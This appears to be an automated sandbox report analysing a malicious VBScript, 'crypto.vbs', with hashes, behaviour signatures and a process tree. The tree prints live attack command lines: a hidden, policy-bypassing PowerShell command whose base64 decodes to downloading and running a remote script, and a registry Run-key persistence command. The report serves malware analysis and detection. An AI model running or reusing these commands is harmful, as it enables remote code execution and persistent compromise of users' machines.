Analysis
max time kernel: 122s
max time network: 126s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 30/01/2025, 08:50
Static task: static1
Behavioral task: behavioral1
Sample: crypto.vbs
Resource: win7-20241010-en
General
Target: crypto.vbs
Size: 273KB
MD5: d3a2ad6fb6dab0fa9dc4372edd2e2c36
SHA1: 01e30df2eed8f6945c8705e1289f1a5fb874f9ad
SHA256: ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4
SHA512: c698631d9d5c76b4e6d99a22d3057f0c030865098ab156eff7070c672230af0718dc970542cc96d31defe23ce1aa5b6ef4b42c41d2f1f60ee4ec10a54b9543a6
SSDEEP: 6144:uvpZGWTfNhok1a5w8PQAb4zfn2Lhi0XmQU8o:4pEYlM5w84icSh5Xm7
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Runs PowerShell with the display window hidden.
  pid 2724 powershell.exe
  pid 3036 powershell.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "C:\\Users\\Admin\\dwm.bat" (process: reg.exe)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (process: powershell.exe)

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid 3036 powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 2724 powershell.exe
  pid 3036 powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, pid 2724 powershell.exe
  Token: SeDebugPrivilege, pid 3036 powershell.exe

Suspicious use of WriteProcessMemory (16 IoCs; columns: pid, Process, target pid, procid_target)
  PID 1104 WScript.exe wrote to memory of 2056 (procid_target 31), 3 events
  PID 2056 cmd.exe wrote to memory of 2368 (procid_target 33), 3 events
  PID 2368 cmd.exe wrote to memory of 2724 (procid_target 35), 3 events
  PID 2368 cmd.exe wrote to memory of 2628 (procid_target 36), 3 events
  PID 2368 cmd.exe wrote to memory of 3036 (procid_target 37), 4 events
Processes
(depth 1) C:\Windows\System32\WScript.exe, PID 1104
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\crypto.vbs"
  - Suspicious use of WriteProcessMemory

  (depth 2) C:\Windows\System32\cmd.exe, PID 2056
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
    - Suspicious use of WriteProcessMemory

    (depth 3) C:\Windows\system32\cmd.exe, PID 2368
      command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
      - Suspicious use of WriteProcessMemory

      (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 2724
        command line: powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      (depth 4) C:\Windows\system32\reg.exe, PID 2628
        command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
        - Adds Run key to start application

      (depth 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, PID 3036
        command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
(no path recorded)
  Filesize: 265KB
  MD5: 6e899645463d001464d3b7d1ffe224fa
  SHA1: 04d16d1d22358ec0f5100855cf7a105096c8beb3
  SHA256: 80226cfbbd380486029f9f2b06af35c1b7ae4efabe32eaf653ad4e846eeab7fb
  SHA512: e0b29154049fcfc760d42dc31857d66a2e460c3e882cfd5341aeea8c975d3e1fb91d02744e313aa844695b8900cc821d2f8ce06afd8326df06719152072b526e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SE76N6FEWZ27YKTSR0CV.temp
  Filesize: 7KB
  MD5: 2f3b8a50d0a5daf2539ad78e690f3a43
  SHA1: da3491ed681110f061e612bd9bde3d2e2e6732ac
  SHA256: 416309b2a666a9381ab6cd9198e656bbe5cc70cbabecc67fc6e658853e379c0e
  SHA512: 9764e19d57781b59eb1c67eea32b04fc54587a3de2f4f4d11293dc972730f99b743917ff158f94819ea037d645af5466352245a6918345d41943077f7982f121